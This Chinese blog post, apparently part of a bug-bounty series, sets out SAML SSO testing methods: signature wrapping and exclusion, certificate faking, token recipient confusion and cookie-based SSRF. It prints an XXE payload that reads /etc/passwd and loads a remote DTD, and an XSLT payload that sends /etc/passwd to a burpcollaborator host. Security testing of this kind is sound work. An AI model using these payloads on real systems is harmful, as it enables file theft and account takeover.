赏金猎人系列-如何测试sso相关的漏洞(II)

于 2022-10-31 12:01:00 发布
阅读量63 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/richard1230/article/details/132997867
版权

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

本文选自本人公众号: growing0101

前言

本文承接前文,继续梳理sso漏洞相关的测试方法.

正文

第八种情况

如果发现有uuid的这种形式,可以尝试将其更改为攻击者的uuid,例如,你可以改为内部员工或者说是管理员的账户的电子邮箱;

测试步骤:(工具使用Burp Suite)

  1. 用令牌拦截SAML请求

  2. 将请求发送是Repeater

  3. 切换到SAML Raider标签

  4. 将UUID更改为受害者帐户的UUID

  5. 点击Go

第九种情况

尝试弄清楚服务器是否容易受到XSW(XML Signature Wrapping)的攻击?

测试步骤:

1.用令牌拦截SAML请求
2.将请求发送是Repeater
3.切换到SAML Raider标签
4.选择XSW号码攻击,例如XSW3
5.点击Apply XSW
6.点击Go

第十种情况

试着找出服务器是否容易受到XSE(XML Signature Exclusion )的攻击

测试步骤:

1.用令牌拦截SAML请求
2.将请求发送是Repeater
3.切换到SAML Raider标签
4.点击Remove Signatures
6.点击Go

第十一种情况

试着弄清楚服务器是否检查签名者的身份

测试步骤:

1.用令牌拦截SAML请求

2.将请求发送是Repeater

3.切换到SAML Raider标签

4.点击Sent Certificate至SAML Raider的证书

5.切换至SAML Raider Certificates

6.点击Save and Self-Sign

7.返回至SAML Raider Tab

8.点击On (Re-)Sign message 或者 Assertion 或者 Both

9.点击Go

第十二种情况

尝试在SAML响应的顶部注入XXE有效负载:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY file SYSTEM "file:///etc/passwd">
<!ENTITY dtd SYSTEM "http://www.me.com/text.dtd" >]>
<samlp:Response ID="" > <saml:Issuer></saml:Issuer>
<ds:Signature > 
......
&dtd
.....

第十三种情况

尝试将XSLT有效负载作为SAML响应的子节点注入Transforms元素

...
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
...
<ds:Transforms>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="doc">
<xsl:variable name="file" select="unparsed-text('/etc/passwd')"/> <xsl:variable name="escaped" select="encode-for-uri($file)"/> <xsl:variable name="attackerUrl" select="'http://id.burpcollaborator.net/'"/> <xsl:variable name="exploitUrl" select="concat($attackerUrl,$escaped)"/> <xsl:value-of select="unparsed-text($exploitUrl)"/>
</xsl:template> </xsl:stylesheet> </ds:Transforms>
</ds:Signature> 
...

第十四种情况

如果受害者能够接受由为攻击者提供服务的同一身份提供者所发行的令牌,那么你就可以接管受害者的账户。

测试步骤:

1.拦截SAML令牌响应

2.向受害者发送SAML令牌响应

3.尝试让受害者点击SAML令牌响应

4.从攻击者的浏览器尝试使用SAML令牌响应

第十五种情况

在测试SSO时,尝试在Burp Suite中搜索Cookie头中的url,例如Host=IP;如果有尝试改变IP为你的IP,以获得SSRF

POST /sso HTTP/1.1
Host: www.company.com 
User-Agent: Mozilla/5.0
Cookie: Host=changed-IP:PORT; 
Referer: https://previous.com/path 
Origin: https://www.company.com

RelayState=path&SAMLResponse=base64(SAML-Structure)

更多精彩内容请关注公众号 growing0101

参考

https://hackerone.com/reports/136169

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#xml-signature-wrapping

https://research.aurainfosec.io/bypassing-saml20-SSO/?lipi=urn%3Ali%3Apage%3Ad_flagship3_feed%3BxtHwFzjkSyaBXhbuvBbOYg%3D%3D

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#xml-signature-exclusion

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#certificate-faking

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#certificate-faking

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#xml-external-entity-via-saml

https://web-in-security.blogspot.com/2014/11/detecting-and-exploiting-xxe-in-saml.html

https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#extensible-stylesheet-language-transformation-via-saml

https://www.contextis.com/en/blog/xslt-server-side-injection-attacks

https://web.archive.org/web/20190505230052/https://www.contextis.com/en/blog/xslt-server-side-injection-attacks

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#token-recipient-confusion

https://www.economyofmechanism.com/office365-authbypass.html

https://medium.com/@th3g3nt3l/how-i-found-an-ssrf-in-yahoo-guesthouse-recon-wins-8722672e41d4

richard1230
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sso登陆劫持漏洞(单点登录劫持,低危)
墨痕诉清风的博客
10-15 3914
如果使用以下token,再次访问http://abc.com.test/Account/Login,可以发现已经登陆。这里可以理解为,门卫不知道你是谁,然后让你去某某处盖章,你去盖章完成后回到门卫处,门外验证红章没问题就让你通过。sso设计目的是简化登陆方式,可能有很多系统,但是多个系统都是一个机构的,每个系统每次都要分别登陆就很复杂。提交后,网页提示无法连接abc.com.test,并且抓取到了一段数据包,包含了登陆成功的token。sso单点登陆,用户一次登陆,所有系统都可访问。...
zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131)
xiaobai_20190815的博客
03-09 267
CVE-2022-23131
赏金猎人系列-如何测试sso相关漏洞
richard1230的博客
10-25 1135
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
理解这几个安全漏洞,你也能做安全测试【干货建议收藏】
人生不怕起点低,就怕没追求
09-14 1422
01、短信炸弹 1、漏洞描述 短信轰炸攻击是常见的一种攻击,攻击者通过网站页面中所提供的发送短信验证码的功能处,通过对其发送数据包的获取后,进行重放,如果服务器短信平台未做校验的情况时,系统会一直去发送短信,这样就造成了短信轰炸的漏洞。 2、渗透测试 手工找到有关网站注册页面,认证页面,是否具有短信发送页面,如果有,则进行下一步。 通过利用burp或者其它抓包截断工具,抓取发送验证码的数据包,并且进行重放攻击,查看手机是否在短时间内连续收到10条以上短信,如果收到大量短信,则说明存在该漏洞。 .
Zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131)
江左盟的博客
02-25 1万+
产品简介 Zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AI
SSO 单点登录
憧憬的专栏
07-29 1万+
简介 SSO英文全称Single Sign On 单点登录是一种控制多个相关但彼此独立的系统访问权限的机制, 拥有这一权限的用户 可以使用单一的ID和密码访问某个或多个系统从而避免使用不同的用户名或密码,或者通过某种配置无缝地登录每个系统, 它是目前比较流行的企业业务整合的解决方案之一,例如我们使用mis号登陆过公司的一个系统后,再登陆其他系统不用再次输入用户名和密码 单系统登录...
xxl-sso:分布式单点登录框架。(分布式单点登录框架XXL-SSO
02-03
XXL-SSO,一种分布式单点登录框架。 介绍 XXL-SSO是一个分布式单点登录框架。 您只需登录一次即可访问所有受信任的应用程序系统。 它具有“轻量级,可伸缩,分布式,跨域,Web + APP支持访问”功能。 现在,它已经...
xxl-sso-core-1.1.1-SNAPSHOT.jar
09-11
xxl/sso 核心处理包
.net-casSSO-client.rar
08-20
.NET CAS SSO客户端是一款专为.NET开发者设计的身份验证解决方案,它允许用户通过中央认证服务(Central Authentication Service,简称CAS)实现单点登录(Single Sign-On,简称SSO)。CAS是一种开放源码的Web身份...
cas-server sso单点登录服务端
01-07
6. **测试SSO功能**:通过登录CAS-server,然后尝试访问已集成的应用,检查是否能够实现无缝登录。 总的来说,CAS-server SSO服务端是一个强大的工具,它为企业提供了一种高效、安全的单点登录解决方案。理解其工作...
CAS--SSO单点用到的jar包
10-18
CAS(Central Authentication Service)是一种广泛使用的开放源代码的单点登录(Single Sign-On,简称SSO)框架。SSO允许用户在访问多个应用系统时只需要进行一次身份验证,之后访问其他系统无需再次输入凭证,提高...
SSO单点登录解决方案
topMan'blog
05-17 302
实现SSO的技术主要有:(1)基于cookies实现,需要注意如下几点:如果是基于两个域名之间传递sessionid的方法可能在windows中成立,在unix&amp;linux中可能会出现问题;可以基于数据库实现;在安全性方面可能会作更多的考虑。另外,关于跨域问题,虽然cookies本身不跨域,但可以利用它实现跨域的SSO。(2)Broker-based(基于经纪人),例如Kerberos等;...
XSS跨站脚本攻击防御和Cookie,及SSO单点登录原理
热门推荐
逍遥飞鹤的专栏
05-24 1万+
XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。 XSS攻击        
Zabbix SAML SSO认证绕过漏洞(CVE-2022-23131)
Blue的博客
03-06 4843
漏洞描述 Zabbix对客户端提交的Cookie会话存在不安全的存储方式,导致在启动SAML SSO认证模式的前提下,恶意用户可通过构造特殊请求绕过认证,获取管理员权限,进而可实现RCE。 影响范围 5.4.0 - 5.4.8 6.0.0alpha1 漏洞复现 1.首先访问Zabbix首页,提取Cookie并进行base64解码: 2.构造poc我们加入username_attribute,将其赋值为Admin(Zabbix内置的管理员名称),并将其base64编码
chromedriver-mac-arm64_126.0.6474.0.zip
07-31
chromedriver-mac-arm64_126.0.6474.0.zip
chromedriver-mac-arm64_128.0.6548.0.zip
07-31
chromedriver-mac-arm64_128.0.6548.0.zip
MySQL查询加速器:利用Query Cache提升效率
07-31
MySQL是一个流行的开源关系型数据库管理系统(RDBMS),广泛用于Web应用程序的后端数据存储。它基于结构化查询语言(SQL)来管理数据,并且是LAMP(Linux, Apache, MySQL, PHP/Python/Perl)技术栈的一部分,这个技术栈常用于构建动态网站和Web应用程序。 MySQL的特点包括: - **开放源代码**:MySQL的源代码是公开的,任何人都可以自由使用和修改。 - **跨平台**:MySQL可以在多种操作系统上运行,包括Linux、Windows、macOS等。 - **高性能**:MySQL以其快速的查询处理和良好的性能而闻名。 - **可靠性**:MySQL提供了多种机制来确保数据的完整性和可靠性,包括事务支持、备份和恢复功能。 - **易于使用**:MySQL提供了简单直观的界面和丰富的文档,便于用户学习和使用。 - **可扩展性**:MySQL支持从小型应用到大型企业级应用的扩展。 - **社区支持**:由于其广泛的使用,MySQL拥有一个活跃的开发者社区,提供大量的资源和支持。 MySQL被广泛应用于各种场景,包括在线事务处理(OL
Objective-C语言的基础教程.md
最新发布
07-31
Objective-C是一种面向对象的编程语言,是C语言的扩展。它主要用于苹果的iOS和macOS应用程序开发。
django-simple-sso实现单点登录
05-12
Django-simple-sso是一个用于Django应用程序的单点登录(SSO)解决方案。它允许用户通过一个统一的登录页面,使用一个凭证登录多个Django应用程序,从而实现单点登录。 下面是使用django-simple-sso实现单点登录的步骤: 1. 安装django-simple-sso:使用pip安装django-simple-sso。 ``` pip install django-simple-sso ``` 2. 配置Django应用程序:在settings.py文件中添加django-simple-sso的配置。 ``` INSTALLED_APPS = ( ... 'simplesso', ... ) MIDDLEWARE = [ ... 'simplesso.middleware.SSOAuthMiddleware', ... ] SIMPLESSO_SERVER_URL = 'http://your-sso-server-url.com' SIMPLESSO_SERVER_TOKEN = 'your-sso-server-token' ``` 3. 配置SSO服务器:在SSO服务器上创建一个应用程序,并将其添加到Django应用程序列表中。 4. 在Django应用程序中使用SSO:在视图函数中使用simplesso.decorators.sso_required装饰器,以确保用户已经通过SSO登录。 ``` from simplesso.decorators import sso_required @sso_required def my_view(request): # Your code here ``` 完成以上步骤后,用户可以在一个Django应用程序中登录,然后在其他Django应用程序中访问受保护的页面,而无需再次登录。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值